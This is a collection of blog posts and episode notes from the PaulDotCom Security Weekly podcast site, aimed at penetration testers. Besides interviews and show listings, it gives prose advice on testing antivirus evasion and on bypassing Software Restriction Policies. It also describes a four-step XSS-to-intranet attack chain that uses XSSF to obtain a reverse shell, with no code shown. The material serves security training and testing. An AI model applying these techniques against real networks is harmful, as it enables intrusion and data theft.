In part 1 we interview Nick Selby, a newly minted police officer of the Dallas-Fort Worth area. He was formerly an information security analyst and consultant for nine years, and worked in physical security and intelligence consulting in various roles since 1993 and was a travel writer for European destinations in a previous life.

Episode 253 Show Notes

Episode 253 Part 1 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

Audio Feeds:

The list below may sound like eight different guests, but it seems that special guest Nick Selby has been at one point or another, pilot, travel writer, sound engineer (for RUN DMC no less), editor, webmaster and, more recently, law enforcement officer and blogger.

Join us tonight at 7:30 PM EDT for Episode 253, where Nick will expound on Selby's First Law: "If your network security framework for law enforcement has a number in its name, it's not basic enough."

Be sure to catch the interview as it was meant to be enjoyed, live, via the link below:

As much as possible we need to automate security testing. I know this always starts a flame war, however, with the complexity of networks growing, especially with virtualization, it’s more important. Example: Netflix released their network management approaches, and it’s a sharp contrast to the way we've managed in the past. In the past, it’s been a "OMG don't touch it, you might break it." Well, if you can break it, there's something that needs to be fixed, and if you don't know what's broken, how can you fix it? Netflix even goes so far as to take down portions of the network and see how it reacts. Now, as Mortman says, “careful with live ammo.” But this is how I always wanted to manage a network. In a controlled environment test performance, reliability, and security. Then, fix the problems you find. If you have fail-over, force it to fail over. Scan the network constantly, if stuff crashes or has vulnerabilities, fix them. It’s almost as if we need a QA department within every IT department to test it on a regular basis and track the fixes. Better you find the weaknesses than wait for an attacker or "network anomaly" to find it for you and go into "firefighting mode" by trying to fix it with management breathing down your neck.

That... And this post is merely an excuse to have a picture of the Simpsons Smoking Monkeys..

Remember, good security is really just good systems administration. We strongly recommend looking at the documents that are available from visible operations.

In this episode we interview Matt Yoder! Matt is a lover of fine pens and paper, and a pencrafter. He has also spent time, in multiple stints, performing direct security consulting, including assessment and auditing, security systems support, and firewall deployment. He currently spends his days, and earns something resembling an income, assisting with server administration for a major University in the midwest, which prefers to go unnamed. (Due to audio problems we are unable to release the video, sorry about that!)

Then we discuss How wide open is your voicemail, the rise of security monkeys, rent-a-laptop, orange cartoon octopus virus, stroke development, a hacking epidemic, attacking small firms during the drunken security news segment:

Episode 252 Show Notes

Episode 252 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez, John Strand, & Jack Daniel

Audio Feeds:

There have been a number of students of mine that have been asking why the bypass of Software Restriction Policies matters. This trickle of questions started the first time I taught SANS 660 Advanced Network Penetration Testing and has permeated through the other classes I have taught over the past few months.

We at PDC have been testing a number of Citrix implementations and bypassing SRP is becoming as important as bypassing AV. The reason for this is because once you can bypass SRP the whole arsenal of the command line is at your disposal. Look, the ability to upload Meterpreter is great. However, when attacking a domain there are a number of additional commands and Windows snap-ins that are essential for owning a domain. Thankfully, there are a number of outstanding resources available online. One of them is Wicked Clown.

Here are a few of his outstanding videos. You know the videos are good because I generally hate clowns.

The final reason bypassing SRP is so important is that it highlights the risk of a standard user account being used to attack the rest of the domain using built-in tools.

I would also like to say thanks to Peter Danhieux for putting together a number of outstanding SRP bypass attacks.

-strandjs

David Kennedy, Jim O'Gorman, Devon Kearns, join us to talk about their new book! (Mati Aharoni is also an author but could not make it). "...while Metasploit is used by security professionals everywhere, the tool can be hard to grasp for first-time users. Metasploit: The Penetration Tester's Guide fills this gap by teaching you how to harness the Framework and interact with the vibrant community of Metasploit contributors."

Drunken security news, including: Hacking femtocell, Wifi hacker sent to jail, losing your phone at the airport, RIP Win XP, long live "Hef", binary C&C over HTTP, fresh PuTTY, Loki explained, RFID bootable distro, process injection, shoulder surfing FTW.

Episode 251 Show Notes

Episode 251 Part 2 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

Audio Feeds:

In part 1 we interview Claudio Criscione a security test engineer at Google. Before joining the company in 2011, Claudio was a penetration tester for most of his career, assessing the security of large infrastructures as well as holding roles in webapp and virtualization security.

Video of the interview with Claudio:

Episode 251 Show Notes

Episode 251 Part 1 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

Audio Feeds:

We're back to our regular podcast schedule tonight with Matt Yoder, Death Envelope extraordinaire, for Episode 252. Catch the interview as it was meant to be watched, live, via the link below:

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 252 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand and Mike Perez.

Part 2 of episode 250 was a wild ride! Our friends, including Caitlin Johansen from Core Security, Bill and Trent from i-hacked, and Dave "I give big hugs" Kennedy join us to reflect on the past 250 epsiodes of PaulDotCom:

Then, we get really drunk and talk about security news:

Episode 250 Show Notes

Episode 250 part 2 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

Audio Feeds:

Sorry for the long delay! Our new production system is still in process, and you will see episodes released more timely. Our 250th episode was extremely special, featuring Randal Schwartz, and a host of good friends and familiar faces!

In part 1 we interview Randal Schwartz:

Episode 250 Show Notes

Episode 250 part 1 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

Audio Feeds:

One of the common questions that I receive when teaching for SANS is how to bypass AV. I thought it would be fun to take a few moments and share some of the best articles I have read recently on the topic and share a couple of pitfalls to avoid during the process.

First, if you are testing an organization that is using product X, buy product X. Many testers believe the best way to check and see if their payload is going to get detected is to use Virus Total. Virus Total is great for checking if a piece of software is malware, but it is horrible for testing purposes. There are a couple of reasons for this. First, for many vendors it does not represent what the real product would do on a real system. For example, there is a signature match called Suspicious. Insight that for Symantec that will show as a hit on Virus Total but wont do a damn thing in the real world. Further, there are different AV products that will use more in-depth "Heuristic" checks that are not being used with Virus Total. Finally, and this is the big one, Virus Total will share your samples with the AV vendors. This means you may bypass the AV product of choice today, but they are quickly creating a signature to mess up your test tomorrow.

So, instead we recommend you actually buy the product you are testing. I know that $50+ dollars seems like a lot to swing for a $25K engagement, but I think if you search your office couch you might be able to pull it off.

Next, if you have to test for multiple products use No Virus Thanks instead.

On to the articles. There are two mains ones I would like to share. Both have outstanding explications and are going to show you why this is not a point and click endeavor.

The first up is from ScriptJunkie. This is an outstanding write-up.

Next, mihi has what can be described as the closest thing to a step-by-step walkthrough available.

Please remember this is a process that is not easy and will change constantly. But that is a good thing. It keeps our jobs from simply becoming Nessus/Metasploit/SET do da, do da.

-strandjs

...as if we need another example of why XSS is dangerous...

If you're not using the XSS Framework (XSSF), then you should be.

XSSF is written by Ludovic Courgnaud (CONIX Security) and is described as "a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation." Immediately, you should be thinking BeEF. XSSF is similar to BeEF in how it injects itself into the victim web browser and creates a communication channel to the attacker, but it has some distinct advantages. The largest of these advantages being that it is built on top of the Metasploit Framework (MSF). While BeEF requires the complete development of custom exploits or the addition of a BeEF <-> MSF interface (note the recent addition of MSF browser_autopwn to BeEF), XSSF is designed to use existing MSF browser exploits and modules natively. This is scalable, convenient, and as a result, XSSF inherits a large community of developers. XSSF is written in Ruby and is quite stable. I have been playing with it and using it on assessments and have yet to encounter a crash or bug. It just works. In fact, I've tried some stuff that I fully expected to break the framework, yet worked perfectly. Like BeEF, XSSF comes prepackaged with built-in auxiliary modules which are tailored specifically for leveraging browser-side functionality. Some of these are POCs still in development, but the POCs work, and with some slight tweaking, can become real world usable modules.

The only issue I've encountered with XSSF to date is the fact that XSSF is not a part of the MSF svn trunk. Because of this, if you svn checkout XSSF on top of MSF, as the instructions say, you will break the ability to update either framework. I submitted the issue to Ludovic, and his recommendation was to maintain the integrity of the MSF svn system by using the svn export command for the XSSF trunk which will update all XSSF core files and leave out the svn files. This could possibly leave artifacts if XSSF files are removed from the trunk at a later date, but until MSF includes XSSF in their official trunk, this is what we're left with. A small sacrifice for such great benefits.

Okay, that's a brief overview of XSSF. Now on to what motivated me to write this blog post.

This afternoon I was demoing XSSF for some of my students. I was loading up existing MSF modules such as the signed java applet browser exploit and popping meterpreter shells on fully patched Windows 7 boxes with fully patched browsers. While this was making the desired impact, I wanted to show the students how I could further leverage XSSF to expand the attack surface. I came up with the following scenario.

The scenario:
An attacker is external to a corporate network via a standard security stack (firewall, IDS, border router, etc.). Within the corporate network are employees which have outbound access to the internet. Also within the corporate network is an intranet web server that is only available to internal network users. NOT public facing. The objective of the attacker is shell access to the intranet web server.

The attack:
Through open source research and social engineering, the attacker is able to figure out that the organization is running a web app on their intranet web server that is vulnerable to remote command execution. Here is what the attack looks like.

Step one, hook an internal victim browser via XSS.

Step two, use xssf_tunnel or other module (visited_pages) to see that the user has access to the internal web server. Also, during this step, the attacker notes the ip or hostname of the internal web server and application.

Step three, the attacker starts a listener to accept inbound connections on his attack machine and uses the xssf_csrf module to send a remote command execution payload to the vulnerable web app. The RCE payload will call back to the attacker's machine using a technique such as those found here.

Step four, the attacker receives the connection from the intranet web server and pilfers target data. At this point, the browser hook is no longer needed. If the victim kills the XSSF session by closing their browser, it does not effect the rest of the attack. The attacker is connected directly to the web server.

The conclusion is two-fold, XSSF kicks ass and XSS will still eat your lunch. Patch your boxes, actively monitor your systems, and educate your users.

This week, we podcast on Friday night at 7:30 PM EDT, with special guests in studio!

Episode 250's show notes will be updated as late as possible on Friday night to keep the surprise, but we promise an episode jam packed with references to Cyber Whacking, reflections on 250 episodes of beer soaked podcasting, and perhaps a song or two....

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 250 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

Welcome back after our break for the birthday of the U.S. and not having a live episode last Thursday here is part 2 of episode 249. Kevin Fiscus from NWN STAR team and all around GREAT guy joins us to discuss his work to detect base64 on the network using snort and why it may be important. Then we recap the news the only way we know how.

Episode 249 Show Notes

Episode 249 part 2 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

Audio Feeds:

Are you one of those people who laugh in the face of the almighty WAF?

Then this is for you. A fine contest from Trustawave to test ModSecurity and try to hack a site protected by it from the Trustwave interior. They have setup Modsecurity to proxy 4 insecure web site demo sites.

We love these kinds of challenges because they are a way for the OpenSource community and the PenTest community to get together and actually make security better. Plus, it is an opportunity for you to show how awesome your skills are.

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31